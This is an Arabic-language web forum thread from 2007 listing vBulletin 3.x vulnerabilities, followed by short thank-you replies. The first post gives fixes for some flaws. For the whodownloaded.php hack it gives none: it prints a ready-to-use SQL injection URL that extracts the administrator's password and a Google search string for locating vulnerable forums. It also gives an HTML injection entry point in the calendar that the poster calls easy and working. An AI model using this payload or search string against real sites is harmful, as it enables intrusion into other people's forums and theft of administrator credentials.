موسوعة طعس العربيه


 


العودة   موسوعة طعس العربيه > موسوعة تطوير المواقع والمنتديات > منتدي ثغـــرات النسخـــــه الثالثـــه

منتدي ثغـــرات النسخـــــه الثالثـــه لجميع النسخ التاليه : [vB3.6.0] + [vB3.5.0] + [vB3.0.0] :

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-29-2007, 09:17 PM   #1
مهاجر
كبار الشخصيات


تاريخ التسجيل: May 2007
رقم العضوية : 15463
مجموع المشاركات : 2,767
بمعدل : 4.64 مشاركة في اليوم
معدل التقييم : 100
Rep Power : مهاجر will become famous soon enough مهاجر will become famous soon enough

مهاجر âيه ôîًَىà




جديده في نسخ 3.5.4 وفي سكربت تذاكر الدعم الفني جديده

[ ثغره]المتواجدين الان .. خطيره جدا تسمح برفع الشل


الطريقة الاولي : احذف ملف online.php

الطريقة الثانيه الحمايه من الثغره فهي عن طريق عدم توفير هذه الشروط مثلا الثغره تتطلب ان يكون
$vboptions['showforumusers'] == True
و $DB_site->fetch_array($forumusers) == True قم بتغيير القيم وتنحل المشكله

قم بتغير true الي false



انتهى...


ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,


الـثغرة : من قام بتحميل هذا الملف ,,

نوع الثغرة : SQL Injection in vBulletin ,,

خـطورة الـثغرة : مرتفعة (( T0p )) ,,

معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,

الإصدارات المصابة :

جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,

>>> vBulletin 3.x.x ,,

################

كود الثـغرة :

كود:
whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHER E%20userid=1
كلمة البحث في قوقل :

كود:
inurl:vb/whodownloaded.php

يتبع


ثغره جديده في منتديات vBulletin

من نوع Html_Injection

يعن تقدر تستخدم inject HTML/********** codes



vBulletin Version 3.5.1

و

vBulletin Version 3.5.2

وهي في التقويم

واشتغلت تمام وهي سهله جداً

وهذا الاستغلال

كود:
calendar.php?do=addreminder&e=1

ضعه بعد رابط المنتدى

الترقيع غير متوفر الان

لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم



يتبع



ثغرة أخر عشر مواضيع vb3 / vb2 (خطير)


الثغرة في : منتديات vBulletin

الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3


ملف الثغرة : أخر عشر مواضيع



((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))




  رد مع اقتباس
قديم 05-29-2007, 09:17 PM   #2
قناص
كبار الشخصيات


تاريخ التسجيل: Sep 2006
رقم العضوية : 1674
مجموع المشاركات : 5,463
بمعدل : 6.41 مشاركة في اليوم
العمر : 28
معدل التقييم : 100
Rep Power : قناص will become famous soon enough قناص will become famous soon enough

قناص âيه ôîًَىà




مشكور على الموضوع الممتاز الله لايحرمنا من جديدك ومفيدك ارجو المزيد تقبل تحياتي



  رد مع اقتباس
قديم 10-18-2007, 04:59 PM   #3
دلوعة الرياض
كبار الشخصيات


تاريخ التسجيل: Oct 2007
رقم العضوية : 27437
مجموع المشاركات : 3,352
بمعدل : 7.49 مشاركة في اليوم
معدل التقييم : 100
Rep Power : دلوعة الرياض will become famous soon enough دلوعة الرياض will become famous soon enough

دلوعة الرياض âيه ôîًَىà




يعطيك الله الف عافية اخوي
تسلم على التنبية
تمنياتى لك بالتوفيق
وفى انتظار المزيد
اختك :- دلوعة الرياض



  رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
إختراع بسيط جداً ومهم جداً ناصح منتدي عدد وأدوات الرحلات 4 09-18-2008 02:50 AM
♀هام جداً جداً لمن يملكون منتدى vBulletin ثغرات قاتلة تودي إلى تدمير المنتدى♀ نجم الليل منتدي ثغـــرات النسخـــــه الثالثـــه 2 10-18-2007 05:08 PM
♀هام جداً جداً لمن يملكون منتدى vBulletin ثغرات قاتلة تودي إلى تدمير المنتدى♀ الخفوق منتدي ثغـــرات النسخـــــه الثالثـــه 2 10-18-2007 05:03 PM
تسريع المنتدى..سهلة جداً بو نايف منتدي تطوير منتديـــــvb3.6.0ــات 1 08-20-2007 07:23 PM
لبحث عن الكراك والسيريل نمبر رائع جداً جداً Crack Down v2_2 الثمامة منتدي البرامج العام 0 11-27-2006 03:12 PM


Powered by vBulletin
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd

 

SEO by vBSEO 3.2.0 ©2008, Crawlability, Inc.